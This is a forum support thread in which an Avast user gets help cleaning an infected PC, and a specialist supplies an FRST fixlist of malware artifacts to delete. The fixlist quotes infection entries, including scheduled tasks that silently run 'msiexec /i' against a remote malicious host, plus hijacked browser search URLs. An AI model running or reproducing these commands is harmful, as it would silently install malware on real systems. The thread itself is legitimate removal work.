Conexão Bloqueada Avast

[REDACTED]

Olá, durante a utilização normal do meu PC, mesmo não estando a utilizar qualquer navegador, aparece-me uma mensagem dizendo:


Abortamos a conexão em reserved-18:09 com segurança, pois ela foi infectada com URL: Mal.

Já segui os passos indicados por jefferson sant em:  https://forum.avast.com/index.php?topic=222111.0

Com isso, segue em anexo os logs fornecidos após utilizar a ferramenta FRST

Obrigado desde já!

[REDACTED]

Segue screenshot do ocorrido.

[jefferson sant]

Boa noite PauloEduJr.

Você será encaminhado para o especialista em remoção de malware.
Aguarde enquanto ele irá checar os logs e preparar a correção necessária para seu sistema.

[Sass Drake]

• Open Notepad (click Start button -> type notepad.exe -> press Enter)
• Copy text from code block below and paste it into Notepad

Code: [Select]

Start

HKU\S-1-5-21-3827494730-315343196-2291642818-1001\...\Run: [OFX2MHJ73DG0V1P] => "C:\Program Files\Z2TPWW63HD\Z2TPWW63H.exe"
HKU\S-1-5-21-3827494730-315343196-2291642818-1001\...\Run: [5NKCD3T568NOTBX] => "C:\Program Files (x86)\avdy4xd255s\IT2WO.exe"
HKU\S-1-5-21-3827494730-315343196-2291642818-1001\...\Run: [TD06HHFP5CTIKRU] => "C:\Program Files\MARAE1CS4W\MARAE1CS4.exe"
AppInit_DLLs: C:\ProgramData\Kolnixo\Latdontex.dll => Nenhum Arquivo
AppInit_DLLs-x32: C:\ProgramData\Kolnixo\Unazoocore.dll => Nenhum Arquivo
HKU\S-1-5-21-3827494730-315343196-2291642818-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOs8M5OH4pNp6eRJDJkl1N_EQfTv4f0rjOczo32Xtz3N-27pUJK0PO-diJHRoSXf5bdW2FI2OIzOXXhqdKPlSwWb8CKIjyo-c0fgE_8ZYmppJqT_Oif-BWEhkaspvFCfftu3EN8Tl63EKk9_xasBgM8oTBrbuPGW8RfP1fM8,&q={searchTerms}
HKU\S-1-5-21-3827494730-315343196-2291642818-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOs8M5OH4pNp6eRJDJkl1N_EQfTv4f0rjOczo32Xtz3N-27pUJK0PO-diJHRoSXf5bdW2FI2OIzOXXhqRiJPeLR9xpZw-YCRDaqHUNFn4VvdPoH3kThd5Pb-DfTeDFWC3jmZ1uTs96rKYaW-FFJwcupTKq-GkE7JtUIUQmlM,
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOs8M5OH4pNp6eRJDJkl1N_EQfTv4f0rjOczo32Xtz3N-27pUJK0PO-diJHRoSXf5bdW2FI2OIzOXXhqdKPlSwWb8CKIjyo-c0fgE_8ZYmppJqT_Oif-BWEhkaspvFCfftu3EN8Tl63EKk9_xasBgM8oTBrbuPGW8RfP1fM8,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3827494730-315343196-2291642818-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOs8M5OH4pNp6eRJDJkl1N_EQfTv4f0rjOczo32Xtz3N-27pUJK0PO-diJHRoSXf5bdW2FI2OIzOXXhqdKPlSwWb8CKIjyo-c0fgE_8ZYmppJqT_Oif-BWEhkaspvFCfftu3EN8Tl63EKk9_xasBgM8oTBrbuPGW8RfP1fM8,&q={searchTerms}
FF ProfilePath: C:\Users\Larissa\AppData\Roaming\Mozilla\Firefox\Profiles\h1uvz66m.default [2018-10-08]
FF user.js: detected! => C:\Users\Larissa\AppData\Roaming\Mozilla\Firefox\Profiles\h1uvz66m.default\user.js [2017-06-30]
FF Homepage: Mozilla\Firefox\Profiles\h1uvz66m.default -> file:///C:/ProgramData/Kolnixos/ff.HP
FF NewTab: Mozilla\Firefox\Profiles\h1uvz66m.default -> file:///C:/ProgramData/Kolnixos/ff.NT
FF Extension: (System Table) - C:\Users\Larissa\AppData\Roaming\Mozilla\Firefox\Profiles\h1uvz66m.default\Extensions\383882@modext.tech.xpi [2018-08-22]
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js [2018-09-17] <==== ATENÇÃO
CHR NewTab: Default ->  Not-active:"chrome-extension://pbdpajcdgknpendpmecafmopknefafha/index.html"
Task: {175C0283-03A8-4588-AE0A-D2A13688C342} - System32\Tasks\{D9CB0165-AADE-AFE6-309A-89FFBC6068FA} => C:\Windows\SysWOW64\yEiCoYMHMkAII.exe
Task: {340341A9-02B5-4732-B1BE-E95FA8B555B5} - System32\Tasks\{977FC540-862A-1485-BE8E-EBE713CA2632} => "msiexec.exe" /i hxxp://reserved-1809.info/wqinlpdbtyiae.iim /q
Task: {ABA50C80-93BA-47D7-9B71-E787F5DAE34E} - System32\Tasks\{51429B8F-1957-2A2F-F8F9-19D260D02656} => C:\Program Files (x86)\EdEyamlne.exe <==== ATENÇÃO
Task: {DA8F3809-E003-4362-A9E6-336B51F17E3C} - System32\Tasks\{35F07B8B-E8E3-128A-9CD2-641985BE45E2} => "msiexec.exe" /q /i hxxp://reserved-1809.info/ieokzkigppaxj.avg
ShortcutWithArgument: C:\Users\Larissa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\Larissa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\Larissa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
VirusTotal: C:\Program Files\Z2TPWW63HD\Z2TPWW63H.exe;C:\Program Files (x86)\avdy4xd255s\IT2WO.exe;C:\Program Files\MARAE1CS4W\MARAE1CS4.exe;C:\Windows\SysWOW64\yEiCoYMHMkAII.exe;
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxlctlfudivq`qsp`29hfm [0]
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
AlternateDataStreams: C:\Users\Todos os Usuários\Reprise:wupeogjxlctlfudivq`qsp`29hfm [0]
AlternateDataStreams: C:\Users\Todos os Usuários\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
C:\Users\Larissa\AppData\Roaming\if1c3d5ltac
C:\Users\Larissa\AppData\Roaming\3a3uavskp25
C:\Program Files\Z2TPWW63HD
C:\Program Files (x86)\avdy4xd255s
C:\Program Files\MARAE1CS4W
C:\ProgramData\Kolnixo
C:\ProgramData\Kolnixos
C:\Windows\SysWOW64\yEiCoYMHMkAII.exe
C:\Program Files (x86)\EdEyamlne.exe
2018-09-17 14:51 - 2018-09-17 14:51 - 007784960 _____ () C:\Users\Larissa\AppData\Local\agent.dat
2018-09-17 14:51 - 2018-09-17 14:51 - 000070896 _____ () C:\Users\Larissa\AppData\Local\Config.xml
2018-09-17 14:51 - 2018-09-17 14:51 - 002020245 _____ () C:\Users\Larissa\AppData\Local\Dentodex.tst
2018-09-17 14:50 - 2018-09-17 14:50 - 000017664 _____ () C:\Users\Larissa\AppData\Local\InstallationConfiguration.xml
2018-09-17 14:50 - 2018-09-17 14:50 - 000140800 _____ () C:\Users\Larissa\AppData\Local\installer.dat
2018-09-17 14:51 - 2018-09-17 14:51 - 000018432 _____ () C:\Users\Larissa\AppData\Local\Main.dat
2018-09-17 14:51 - 2018-09-17 14:51 - 000005568 _____ () C:\Users\Larissa\AppData\Local\md.xml
2018-09-17 14:51 - 2018-09-17 14:51 - 000126464 _____ () C:\Users\Larissa\AppData\Local\noah.dat
2018-09-17 14:50 - 2018-09-17 14:50 - 001413120 _____ () C:\Users\Larissa\AppData\Local\sham.db
2018-09-17 14:51 - 2018-09-17 14:51 - 000032038 _____ () C:\Users\Larissa\AppData\Local\uninstall_temp.ico
2018-09-17 14:51 - 2018-09-17 14:51 - 000000003 _____ () C:\Users\Larissa\AppData\Local\wbem.ini
EmptyTemp:

End

• Go to File -> Save As
• Make sure that  UTF-8 is selected as Encoding (left side of Save button)
• Save it as fixlist.txt on Desktop
• Open again FRST and click on button Fix
• Wait until FRST finishes
• fixlog.txt should be genereted and opened. Attach it your post and wait further instructions.

[REDACTED]

Segue fixlog.

[jefferson sant]

Segue fixlog.

Encaminhei a Sass Drake. O log é verificado amanhã.

[Sass Drake]

What is system status now?